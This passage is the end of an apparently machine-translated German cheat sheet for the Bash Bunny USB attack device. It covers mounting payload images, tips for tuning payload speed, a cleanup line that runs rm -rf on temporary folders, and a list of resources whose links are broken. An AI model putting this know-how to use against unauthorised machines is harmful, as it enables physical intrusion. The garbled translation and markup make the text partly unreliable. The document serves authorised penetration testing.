mkdir -p /mnt/test mount -o loop /root/udisk/images/payload.img /mnt/test ls -la /mnt/test umount /mnt/test ```_
Leistungsoptimierung¶
```bash
Optimize payload execution speed¶
Use DELAY sparingly¶
Combine multiple STRING commands¶
Use RUN for single commands¶
Monitor system resources¶
top free -h df -h
Clean up temporary files¶
rm -rf /tmp/* rm -rf /var/tmp/* ```_
Ressourcen¶
- Bash Bunny Offizielle Dokumentation
- Hak5 Community Forums
- Bash Bunny Payload Repository
- [Physical Penetration Testing Guide](LINK_7
- (LINK_7)
- [Social Engineering Toolkit](LINK_7
- [Physical Security Assessment Methodology](LINK_7_
--
*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung des Bash Bunny für physikalische Penetrationstests und Sicherheitsbewertungen. Stellen Sie immer sicher, dass Sie eine ordnungsgemäße Genehmigung haben, bevor Sie körperliche Sicherheitstests durchführen und verantwortungsvolle Offenlegungspraktiken verfolgen. *